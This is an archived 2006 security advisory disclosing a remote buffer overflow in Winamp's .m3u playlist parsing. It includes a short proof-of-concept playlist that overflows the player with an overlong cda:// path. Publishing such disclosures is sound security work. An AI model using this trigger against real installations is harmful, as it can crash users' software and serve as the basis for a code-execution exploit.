TUCoPS :: Windows Apps :: v7-2748.htm

Winamp .m3u fun again ;)
Winamp .m3u fun again ;)
Winamp .m3u fun again ;)


Winamp .m3u Remote Buffer Overflow Vulnerability (0day)

by Sowhat

Discovery: 2005.07.21
Pubulished: 2006.02.16

http://secway.org/advisory/AD20060216.txt 

Affected:

Winamp All versions (including 5.13)

Overview:

WinAMP is a popular media player that supports various media and playlist
formats, including playlists in m3u or pls format.


This bug was found during Reading the following Advisory by tombkeeper@NSFOCUS
http://www.nsfocus.com/english/homepage/research/0501.htm 


PoC.m3u

#EXTM3U
#EXTINF:5,demo
cda://demoAAAAAAAAAAAAAAAAAAAAAA[...about 3600?...]AAAAAAAAAAAAAA.mp3


btw: Alan McCaig (b0f) published a similar 0day vulnerability today,
so I think it's time to PUB this lame advisory tooooo.

see: http://www.frsirt.com/english/advisories/2006/0613 


WORKAROUND:

No WORKAROUND this time.
plz check the vendor's website for update
OR, dont use Winamp ;)

Greetings to tombkeeper,killer,baozi, all 0x557 & XFOCUS guys






--
Sowhat
http://secway.org 
"Life is like a bug, Do you know how to exploit it ?"

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH